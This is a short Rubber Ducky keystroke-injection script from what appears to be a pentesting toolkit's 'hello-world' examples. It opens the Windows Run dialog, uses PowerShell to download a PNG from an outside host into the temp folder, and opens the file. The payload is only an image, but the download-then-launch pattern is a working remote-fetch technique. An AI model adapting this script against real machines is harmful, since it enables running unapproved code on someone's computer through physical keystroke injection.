sec-pentesting-toolkit/Rubber_Duck/pwn/windows/hello-world/example2/exploit.txt
2014-11-03 10:49:17 -05:00

8 lines
No EOL
245 B
Text

REM dowload and open an picture
DELAY 3000
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://mariwahl.us/figs/sn.png','%TEMP%\CRAZY_IMAGE.png');
DELAY 100
STRING Start-Process "%TEMP%\CRAZY_IMAGE.png"
ENTER